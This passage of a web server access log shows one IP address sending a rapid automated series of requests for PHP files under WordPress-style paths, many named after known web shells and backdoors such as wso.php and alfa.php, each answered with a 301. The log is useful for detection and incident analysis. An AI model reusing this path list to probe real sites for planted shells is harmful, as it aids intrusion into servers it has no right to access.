/themes/twentytwentytwo/moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:12:54 +0700] "GET /themes/themes/Cyb3r.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:12:54 +0700] "GET /plugins/fix/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:54 +0700] "GET /customize/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:55 +0700] "GET /plugins/stats/instoll.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:12:55 +0700] "GET /informasi/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:12:55 +0700] "GET /pomo/pomo.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:55 +0700] "GET /random_compat/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 156.146.33.76 - - [16/Sep/2024:10:12:56 +0700] "GET /wp-content/plugins/xltavrat.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:56 +0700] "GET /images/b.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:56 +0700] "GET /random_compat/random-ajax-response.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:12:56 +0700] "GET /pki-validation/dbform.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:56 +0700] "GET /database.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:57 +0700] "GET /css/3e.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:57 +0700] "GET /maint/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:57 +0700] "GET /x/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:57 +0700] "GET /plugins/ubh/2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:58 +0700] "GET /uploads/Simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:58 +0700] "GET /network/mariju.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:58 +0700] "GET /plugins/fix/xxx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:58 +0700] "GET /css/dist/block-directory/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:12:59 +0700] "GET /js/tinymce/skins/wordpress/images/options-permalinks.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:59 +0700] "GET /plugins/apikey/mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:12:59 +0700] "GET /js/js.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:12:59 +0700] "GET /customize/dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:12:59 +0700] "GET /areziohe.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:00 +0700] "GET /pki-validation/wp-load.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:00 +0700] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:00 +0700] "GET /include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:13:00 +0700] "GET /option.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:01 +0700] "GET /plugins/random/init.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:01 +0700] "GET /images/adminfuns.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:01 +0700] "GET /plugins/akismet/views/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:01 +0700] "GET /SimplePie/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:02 +0700] "GET /wp-content/uploads/Piens-ma.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:02 +0700] "GET /wp-configs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:02 +0700] "GET /options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:02 +0700] "GET /wp-add.php?a=c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:13:03 +0700] "GET /themes/fitnessbase/404.php?ok HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:03 +0700] "GET /pki-validation/cong.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:03 +0700] "GET /includes/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 156.146.33.76 - - [16/Sep/2024:10:13:03 +0700] "GET /plugins/ccx/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:03 +0700] "GET /goat.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:04 +0700] "GET /admin-bar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:04 +0700] "GET /plugins/masterslider/inc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:04 +0700] "GET /upgrade/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:04 +0700] "GET /uploads/2023/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:05 +0700] "GET /class-wp-filesystem-base.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 156.146.33.76 - - [16/Sep/2024:10:13:05 +0700] "GET /uploads/2023/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:05 +0700] "GET /plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:05 +0700] "GET /images/file1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:06 +0700] "GET /images/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:06 +0700] "GET /Text/Diff/Engine/blurbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:06 +0700] "GET /wp-includes/IXR/allez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:13:06 +0700] "GET /customize/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:07 +0700] "GET /js/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:07 +0700] "GET /access.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:07 +0700] "GET /css/colors/blue/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:07 +0700] "GET /images/cong.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:07 +0700] "GET /lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:08 +0700] "GET /css/dist/nux/wp-load.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:08 +0700] "GET /Requests/Auth/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:08 +0700] "GET /theme-compat/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:13:08 +0700] "GET /theme-compat/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:09 +0700] "GET /plugins/seoo/ulc2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:09 +0700] "GET /uploads/2023/07/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:09 +0700] "GET /acme-challenge/ajax-restore.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:09 +0700] "GET /includes/class-wp-filesystem-import.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:10 +0700] "GET /SimplePie/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:10 +0700] "GET /ms-media.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:10 +0700] "GET /css/searchq.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:10 +0700] "GET /uploads/2023/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 156.146.33.76 - - [16/Sep/2024:10:13:11 +0700] "GET /alfacgiapi/alfa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:11 +0700] "GET /ID3/wp-includes/ID3/getid3.lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:11 +0700] "GET /css/colors/ocean/lock0360.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:11 +0700] "GET /assets/mpvloi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:11 +0700] "GET /random_compat/random_bytes_cyclone.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:12 +0700] "GET /plugins/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:12 +0700] "GET /js/tinymce/skins/wordpress/images/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:12 +0700] "GET /jp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:12 +0700] "GET /plugins/ubh/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:13 +0700] "GET /images/wp-signup.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:13 +0700] "GET /plugins/wp-help/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:13 +0700] "GET /pki-validation/cuopbnal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:13 +0700] "GET /adminer.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:14 +0700] "GET /themes/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:14 +0700] "GET /js/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:14 +0700] "GET /uplirtba.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:14 +0700] "GET /pki-validation/admin1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:15 +0700] "GET /addPhoto.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:15 +0700] "GET /plugins/all-in-one-wp-migration/lib/controller/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:15 +0700] "GET /admin-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:15 +0700] "GET /web.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:15 +0700] "GET /terms.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:16 +0700] "GET /css/colors/coffee/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:16 +0700] "GET /pki-validation/license.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:16 +0700] "GET /zaza.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:16 +0700] "GET /images/smilies/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:17 +0700] "GET /system/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:17 +0700] "GET /class-wp-pages.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:17 +0700] "GET /themes/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:17 +0700] "GET /customize/123.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:18 +0700] "GET /uploads/k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:18 +0700] "GET /widgets/atomlib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 156.146.33.76 - - [16/Sep/2024:10:13:18 +0700] "GET /alpha.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:18 +0700] "GET /themes/wp-pridmag/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:19 +0700] "GET /assets/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:19 +0700] "GET /wp-admin/maint/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:13:19 +0700] "GET /IXR/imge.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:19 +0700] "GET /plugins/WordPressCore/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:19 +0700] "GET /wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:20 +0700] "GET /pomo/user-new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:20 +0700] "GET /css/colors/blue/uploader.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:20 +0700] "GET /home.php?xsec=team HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - 